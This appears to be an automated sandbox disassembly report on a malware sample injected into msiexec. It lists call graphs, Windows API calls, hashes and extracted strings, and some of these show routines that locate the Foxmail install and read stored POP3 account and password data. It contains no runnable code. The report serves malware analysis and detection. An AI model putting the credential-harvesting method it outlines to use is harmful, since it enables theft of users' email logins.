7668->7677 7694 24ed23de 7669->7694 7672 24ed2639 ___scrt_fastfail 4 API calls 7670->7672 7673 24ed2048 7672->7673 7674 24ed1f8b __RTC_Initialize 7674->7677 7697 24ed22fc RtlInitializeSListHead 7674->7697 7676 24ed1f99 ___scrt_initialize_default_local_stdio_options 7698 24ed46c5 7676->7698 7681 24ed1fb8 7681->7677 7682 24ed4669 _abort 5 API calls 7681->7682 7682->7677 7684 24ed2485 7683->7684 7706 24ed2933 IsProcessorFeaturePresent 7684->7706 7688 24ed2496 7689 24ed249a 7688->7689 7717 24ed53c8 7688->7717 7689->7668 7692 24ed24b1 7692->7668 7693 24ed3529 ___vcrt_uninitialize 8 API calls 7693->7689 7748 24ed24b5 7694->7748 7696 24ed23e5 7696->7674 7697->7676 7701 24ed46dc 7698->7701 7699 24ed2ada _ValidateLocalCookies 5 API calls 7700 24ed1fad 7699->7700 7700->7677 7702 24ed23b3 7700->7702 7701->7699 7703 24ed23b8 ___scrt_release_startup_lock 7702->7703 7704 24ed2933 ___isa_available_init IsProcessorFeaturePresent 7703->7704 7705 24ed23c1 7703->7705 7704->7705 7705->7681 7707 24ed2491 7706->7707 7708 24ed34ea 7707->7708 7709 24ed34ef ___vcrt_initialize_winapi_thunks 7708->7709 7720 24ed3936 7709->7720 7711 24ed34fd 7711->7688 7714 24ed3505 7715 24ed3510 7714->7715 7716 24ed3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7714->7716 7715->7688 7716->7711 7744 24ed7457 7717->7744 7721 24ed393f 7720->7721 7723 24ed3968 7721->7723 7724 24ed34f9 7721->7724 7734 24ed3be0 7721->7734 7725 24ed3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7723->7725 7724->7711 7726 24ed38e8 7724->7726 7725->7724 7739 24ed3af1 7726->7739 7729 24ed38fd 7729->7714 7730 24ed3ba2 ___vcrt_FlsSetValue 6 API calls 7731 24ed390b 7730->7731 7732 24ed3918 7731->7732 7733 24ed391b ___vcrt_uninitialize_ptd 6 API calls 7731->7733 7732->7714 7733->7729 7735 24ed3a82 try_get_function 5 API calls 7734->7735 7736 24ed3bfa 7735->7736 7737 24ed3c18 InitializeCriticalSectionAndSpinCount 7736->7737 7738 24ed3c03 7736->7738 7737->7738 7738->7721 7740 24ed3a82 try_get_function 5 API calls 7739->7740 7741 24ed3b0b 7740->7741 7742 24ed3b24 TlsAlloc 7741->7742 7743 24ed38f2 7741->7743 7743->7729 7743->7730 7747 24ed7470 7744->7747 7745 24ed2ada _ValidateLocalCookies 5 API calls 7746 24ed24a3 7745->7746 7746->7692 7746->7693 7747->7745 7749 24ed24c8 7748->7749 7750 24ed24c4 7748->7750 7751 24ed2639 ___scrt_fastfail 4 API calls 7749->7751 7753 24ed24d5 ___scrt_release_startup_lock 7749->7753 7750->7696 7752 24ed2559 7751->7752 7753->7696 7230 24ed9db8 7231 24ed9dbf 7230->7231 7232 24ed9e20 7231->7232 7234 24ed9ddf 7231->7234 7235 24eda90e 7232->7235 7239 24edaa17 7232->7239 7234->7235 7237 24edaa17 21 API calls 7234->7237 7238 24eda93e 7237->7238 7240 24edaa20 7239->7240 7243 24edb19b 7240->7243 7244 24edb1da __startOneArgErrorHandling 7243->7244 7249 24edb25c __startOneArgErrorHandling 7244->7249 7253 24edb59e 7244->7253 7246 24edb286 7247 24edb8b2 __startOneArgErrorHandling 20 API calls 7246->7247 7248 24edb292 7246->7248 7247->7248 7250 24ed2ada _ValidateLocalCookies 5 API calls 7248->7250 7249->7246 7251 24ed78a3 __startOneArgErrorHandling 5 API calls 7249->7251 7252 24ed9e6e 7250->7252 7251->7246 7254 24edb5c1 __raise_exc RaiseException 7253->7254 7255 24edb5bc 7254->7255 7255->7249 6981 24ed5630 6982 24ed563b 6981->6982 6983 24ed5eb7 11 API calls 6982->6983 6984 24ed5664 6982->6984 6985 24ed5660 6982->6985 6983->6982 6987 24ed5688 6984->6987 6988 24ed56b4 6987->6988 6989 24ed5695 6987->6989 6988->6985 6990 24ed569f RtlDeleteCriticalSection 6989->6990 6990->6988 6990->6990 6742 24ed3eb3 6745 24ed5411 6742->6745 6746 24ed541d _abort 6745->6746 6747 24ed5af6 _abort 38 API calls 6746->6747 6748 24ed5422 6747->6748 6749 24ed55a8 _abort 38 API calls 6748->6749 6750 24ed544c 6749->6750 6991 24ed220c 6992 24ed221a dllmain_dispatch 6991->6992 6993 24ed2215 6991->6993 6995 24ed22b1 6993->6995 6996 24ed22c7 6995->6996 6998 24ed22d0 6996->6998 6999 24ed2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6996->6999 6998->6992 6999->6998 6751 24ed8a89 6752 24ed6d60 51 API calls 6751->6752 6753 24ed8a8e 6752->6753 6758 24ed7a80 6759 24ed7a8d 6758->6759 6760 24ed637b __dosmaperr 20 API calls 6759->6760 6761 24ed7aa7 6760->6761 6762 24ed571e _free 20 API calls 6761->6762 6763 24ed7ab3 6762->6763 6764 24ed637b __dosmaperr 20 API calls 6763->6764 6768 24ed7ad9 6763->6768 6765 24ed7acd 6764->6765 6767 24ed571e _free 20 API calls 6765->6767 6767->6768 6769 24ed7ae5 6768->6769 6770 24ed5eb7 6768->6770 6771 24ed5c45 __dosmaperr 5 API calls 6770->6771 6772 24ed5ede 6771->6772 6773 24ed5efc InitializeCriticalSectionAndSpinCount 6772->6773 6774 24ed5ee7 6772->6774 6773->6774 6775 24ed2ada _ValidateLocalCookies 5 API calls 6774->6775 6776 24ed5f13 6775->6776 6776->6768 7754 24ed7103 GetCommandLineA GetCommandLineW 7755 24ed5303 7758 24ed50a5 7755->7758 7767 24ed502f 7758->7767 7761 24ed502f 5 API calls 7762 24ed50c3 7761->7762 7763 24ed5000 20 API calls 7762->7763 7764 24ed50ce 7763->7764 7765 24ed5000 20 API calls 7764->7765 7766 24ed50d9 7765->7766 7768 24ed5048 7767->7768 7769 24ed2ada _ValidateLocalCookies 5 API calls 7768->7769 7770 24ed5069 7769->7770 7770->7761 7000 24ed281c 7001 24ed2882 std::exception::exception 27 API calls 7000->7001 7002 24ed282a 7001->7002 7003 24ed2418 7004 24ed2420 ___scrt_release_startup_lock 7003->7004 7007 24ed47f5 7004->7007 7006 24ed2448 7008 24ed4808 7007->7008 7009 24ed4804 7007->7009 7012 24ed4815 7008->7012 7009->7006 7013 24ed5b7a __dosmaperr 20 API calls 7012->7013 7015 24ed482c 7013->7015 7014 24ed2ada _ValidateLocalCookies 5 API calls 7016 24ed4811 7014->7016 7015->7014 7016->7006 6777 24ed4a9a 6778 24ed5411 38 API calls 6777->6778 6779 24ed4aa2 6778->6779 7256 24ed679a 7261 24ed67a4 7256->7261 7257 24ed67b4 7258 24ed571e _free 20 API calls 7257->7258 7260 24ed67bb 7258->7260 7259 24ed571e _free 20 API calls 7259->7261 7261->7257 7261->7259 6780 24ed3c90 RtlUnwind

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24ED1137
                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24ED1151
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 24ED115C
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 24ED116D
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 24ED117C
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24ED1193
                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 24ED11D0
                                                                                              • FindClose.KERNEL32(00000000), ref: 24ED11DB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 1083526818-0
                                                                                              • Opcode ID: d74265bbeb0ebaf6b83ef65d8f9507fb24fda211e60d7c62d7196ef6f513ee4b
                                                                                              • Instruction ID: c2c7f94370c4e27d40aa1113b435f994c79572e982e418744e634ff2df2c8f7e
                                                                                              • Opcode Fuzzy Hash: d74265bbeb0ebaf6b83ef65d8f9507fb24fda211e60d7c62d7196ef6f513ee4b
                                                                                              • Instruction Fuzzy Hash: AA21A772544308ABE711EB64EC48F9FBBDCEF88315F000A29F558D3190E774D6058796

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 24ED1434
                                                                                                • Part of subcall function 24ED10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 24ED1137
                                                                                                • Part of subcall function 24ED10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24ED1151
                                                                                                • Part of subcall function 24ED10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 24ED115C
                                                                                                • Part of subcall function 24ED10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 24ED116D
                                                                                                • Part of subcall function 24ED10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 24ED117C
                                                                                                • Part of subcall function 24ED10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 24ED1193
                                                                                                • Part of subcall function 24ED10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 24ED11D0
                                                                                                • Part of subcall function 24ED10F1: FindClose.KERNEL32(00000000), ref: 24ED11DB
                                                                                              • lstrlenW.KERNEL32(?), ref: 24ED14C5
                                                                                              • lstrlenW.KERNEL32(?), ref: 24ED14E0
                                                                                              • lstrlenW.KERNEL32(?,?), ref: 24ED150F
                                                                                              • lstrcatW.KERNEL32(00000000), ref: 24ED1521
                                                                                              • lstrlenW.KERNEL32(?,?), ref: 24ED1547
                                                                                              • lstrcatW.KERNEL32(00000000), ref: 24ED1553
                                                                                              • lstrlenW.KERNEL32(?,?), ref: 24ED1579
                                                                                              • lstrcatW.KERNEL32(00000000), ref: 24ED1585
                                                                                              • lstrlenW.KERNEL32(?,?), ref: 24ED15AB
                                                                                              • lstrcatW.KERNEL32(00000000), ref: 24ED15B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                              • API String ID: 672098462-2938083778
                                                                                              • Opcode ID: 0aba9cbc6715735ffc0971e35299c235916cb04120a676a8a5798c9e9244351f
                                                                                              • Instruction ID: 5263c2a1c59444bef729f97494d44c65a659889e78ada532c88cb56dce8001d5
                                                                                              • Opcode Fuzzy Hash: 0aba9cbc6715735ffc0971e35299c235916cb04120a676a8a5798c9e9244351f
                                                                                              • Instruction Fuzzy Hash: AA81B372A00368AAEB24D7A1DC85FEFB37DEF84710F000596F508E7190EA715A85CF95
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 24ED61DA
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 24ED61E4
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 24ED61F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: ebabbb4aa123c3ff995c087d7a28da1517942ff4091e9c6ad8604fa7c029fa04
                                                                                              • Instruction ID: 464e2ef10617343e2e9275e3a87ea6d18bb7041eefd8f2c7de21566576c995cc
                                                                                              • Opcode Fuzzy Hash: ebabbb4aa123c3ff995c087d7a28da1517942ff4091e9c6ad8604fa7c029fa04
                                                                                              • Instruction Fuzzy Hash: 0531B37590121CDBDB21DF64D988B8DBBB8EF18710F5041DAE81CA7250E7749B868F45
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,24ED4A8A,?,24EE2238,0000000C,24ED4BBD,00000000,00000000,00000001,24ED2082,24EE2108,0000000C,24ED1F3A,?), ref: 24ED4AD5
                                                                                              • TerminateProcess.KERNEL32(00000000,?,24ED4A8A,?,24EE2238,0000000C,24ED4BBD,00000000,00000000,00000001,24ED2082,24EE2108,0000000C,24ED1F3A,?), ref: 24ED4ADC
                                                                                              • ExitProcess.KERNEL32 ref: 24ED4AEE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: c9eedc40186774d056635655d0b64a210eca59225aab4948061b9e89086f8fa3
                                                                                              • Instruction ID: 5181b132534b1adc18eacbfbb0ee94dd4f7e95bf6dd6ee8ba98913b6c00cd33f
                                                                                              • Opcode Fuzzy Hash: c9eedc40186774d056635655d0b64a210eca59225aab4948061b9e89086f8fa3
                                                                                              • Instruction Fuzzy Hash: 28E0B637100208EFEF066F64ED08E8D3F6EEFA5746B504024FA46AB165DB39D943DA54
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 3fc8ee96ac41844f5030a9f38bf4bde1ab2cead5b1d05afb0fc1f813b6d409fb
                                                                                              • Instruction ID: b9d83d9b16ce518e073161865ef8938ec4fd17a368a1b737b9f76671b3e131c8
                                                                                              • Opcode Fuzzy Hash: 3fc8ee96ac41844f5030a9f38bf4bde1ab2cead5b1d05afb0fc1f813b6d409fb
                                                                                              • Instruction Fuzzy Hash: 88A01132300202CFA3008E30A20A20E3AAFEB822A230000A8B80AE0008EB2880008A00

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 24ED1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D1B
                                                                                                • Part of subcall function 24ED1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24ED1D37
                                                                                                • Part of subcall function 24ED1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D4B
                                                                                              • _strlen.LIBCMT ref: 24ED1855
                                                                                              • _strlen.LIBCMT ref: 24ED1869
                                                                                              • _strlen.LIBCMT ref: 24ED188B
                                                                                              • _strlen.LIBCMT ref: 24ED18AE
                                                                                              • _strlen.LIBCMT ref: 24ED18C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$File$CopyCreateDelete
                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                              • API String ID: 3296212668-3023110444
                                                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                              • Instruction ID: e9ab8b1401e0d21e5dfdd30f7b95ec77ec3525a213a097bbd193aa1b972ad602
                                                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                              • Instruction Fuzzy Hash: 5861C172D04218EAFF168BA4C840BDEFBBDAF19204F004596D604BB25DEB745A47CB56

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                              • API String ID: 4218353326-230879103
                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                              • Instruction ID: e05329ec330e248e0f416b15a496ffd6bf4e8a9bd2f96045a5c9e72dbf591def
                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                              • Instruction Fuzzy Hash: C0710673D00228DBFF169BB49884ADFBBFC9F19244F1440D6E644E7245E6749B86CBA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 203 24ed7cc2-24ed7cd6 204 24ed7cd8-24ed7cdd 203->204 205 24ed7d44-24ed7d4c 203->205 204->205 206 24ed7cdf-24ed7ce4 204->206 207 24ed7d4e-24ed7d51 205->207 208 24ed7d93-24ed7dab call 24ed7e35 205->208 206->205 209 24ed7ce6-24ed7ce9 206->209 207->208 211 24ed7d53-24ed7d90 call 24ed571e * 4 207->211 218 24ed7dae-24ed7db5 208->218 209->205 212 24ed7ceb-24ed7cf3 209->212 211->208 216 24ed7d0d-24ed7d15 212->216 217 24ed7cf5-24ed7cf8 212->217 220 24ed7d2f-24ed7d43 call 24ed571e * 2 216->220 221 24ed7d17-24ed7d1a 216->221 217->216 222 24ed7cfa-24ed7d0c call 24ed571e call 24ed90ba 217->222 223 24ed7dd4-24ed7dd8 218->223 224 24ed7db7-24ed7dbb 218->224 220->205 221->220 226 24ed7d1c-24ed7d2e call 24ed571e call 24ed91b8 221->226 222->216 227 24ed7dda-24ed7ddf 223->227 228 24ed7df0-24ed7dfc 223->228 231 24ed7dbd-24ed7dc0 224->231 232 24ed7dd1 224->232 226->220 235 24ed7ded 227->235 236 24ed7de1-24ed7de4 227->236 228->218 238 24ed7dfe-24ed7e0b call 24ed571e 228->238 231->232 240 24ed7dc2-24ed7dd0 call 24ed571e * 2 231->240 232->223 235->228 236->235 243 24ed7de6-24ed7dec call 24ed571e 236->243 240->232 243->235
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 24ED7D06
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED90D7
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED90E9
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED90FB
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED910D
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED911F
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED9131
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED9143
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED9155
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED9167
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED9179
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED918B
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED919D
                                                                                                • Part of subcall function 24ED90BA: _free.LIBCMT ref: 24ED91AF
                                                                                              • _free.LIBCMT ref: 24ED7CFB
                                                                                                • Part of subcall function 24ED571E: HeapFree.KERNEL32(00000000,00000000,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?), ref: 24ED5734
                                                                                                • Part of subcall function 24ED571E: GetLastError.KERNEL32(?,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?,?), ref: 24ED5746
                                                                                              • _free.LIBCMT ref: 24ED7D1D
                                                                                              • _free.LIBCMT ref: 24ED7D32
                                                                                              • _free.LIBCMT ref: 24ED7D3D
                                                                                              • _free.LIBCMT ref: 24ED7D5F
                                                                                              • _free.LIBCMT ref: 24ED7D72
                                                                                              • _free.LIBCMT ref: 24ED7D80
                                                                                              • _free.LIBCMT ref: 24ED7D8B
                                                                                              • _free.LIBCMT ref: 24ED7DC3
                                                                                              • _free.LIBCMT ref: 24ED7DCA
                                                                                              • _free.LIBCMT ref: 24ED7DE7
                                                                                              • _free.LIBCMT ref: 24ED7DFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: d5d9a931bfe980ce3b9d69fcb6ee142cc3a5d3b8b81fdbe80357ce9c5afa96eb
                                                                                              • Instruction ID: 1af1f8721fc5ad38f11bc3ca03e6621b27bf93c2647a9993597226e2972ea607
                                                                                              • Opcode Fuzzy Hash: d5d9a931bfe980ce3b9d69fcb6ee142cc3a5d3b8b81fdbe80357ce9c5afa96eb
                                                                                              • Instruction Fuzzy Hash: 3C314D33600A04DFFB219B38D941B6ABBEDEF01258F20545AE84AE7195DF31A982CB14

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 24ED59EA
                                                                                                • Part of subcall function 24ED571E: HeapFree.KERNEL32(00000000,00000000,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?), ref: 24ED5734
                                                                                                • Part of subcall function 24ED571E: GetLastError.KERNEL32(?,?,24ED924F,?,00000000,?,00000000,?,24ED9276,?,00000007,?,?,24ED7E5A,?,?), ref: 24ED5746
                                                                                              • _free.LIBCMT ref: 24ED59F6
                                                                                              • _free.LIBCMT ref: 24ED5A01
                                                                                              • _free.LIBCMT ref: 24ED5A0C
                                                                                              • _free.LIBCMT ref: 24ED5A17
                                                                                              • _free.LIBCMT ref: 24ED5A22
                                                                                              • _free.LIBCMT ref: 24ED5A2D
                                                                                              • _free.LIBCMT ref: 24ED5A38
                                                                                              • _free.LIBCMT ref: 24ED5A43
                                                                                              • _free.LIBCMT ref: 24ED5A51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 95279c9b71891f277b8b4afd057d99e014784df712d69360dbf2cde1f56067cf
                                                                                              • Instruction ID: 79baf1f10627198039f46d7f7fde99f2248a9261fc50a24606e39838fae3cde3
                                                                                              • Opcode Fuzzy Hash: 95279c9b71891f277b8b4afd057d99e014784df712d69360dbf2cde1f56067cf
                                                                                              • Instruction Fuzzy Hash: 5011B67B520148FFEB11DF54C841CDD3FA9EF14250F2550A1FA08AF269DA32DA519B84

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D1B
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24ED1D37
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D4B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D58
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D72
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D7D
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24ED1D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.2908332498.0000000024ED1000.00000040.00001000.00020000.00000000.sdmp, Offset: 24ED0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.2908311129.0000000024ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.2908332498.0000000024EE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_24ed0000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 1454806937-0
                                                                                              • Opcode ID: 7f1e2f8201c82444806511d38c81b65a1cde28f57d8f127753552031915fc919
                                                                                              • Instruction ID: b07a32c40299052d222d131741710e9d6154d7f6185485f4894c62579e2e692f
                                                                                              • Opcode Fuzzy Hash: 7f1e2f8201c82444806511d38c81b65a1cde28f57d8f127753552031915fc919
                                                                                              • Instruction Fuzzy Hash: F2217F7294111CEFF7119BA0AD8CEEEBABCEB59245F0009A5F512E2144D6749E468A70

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
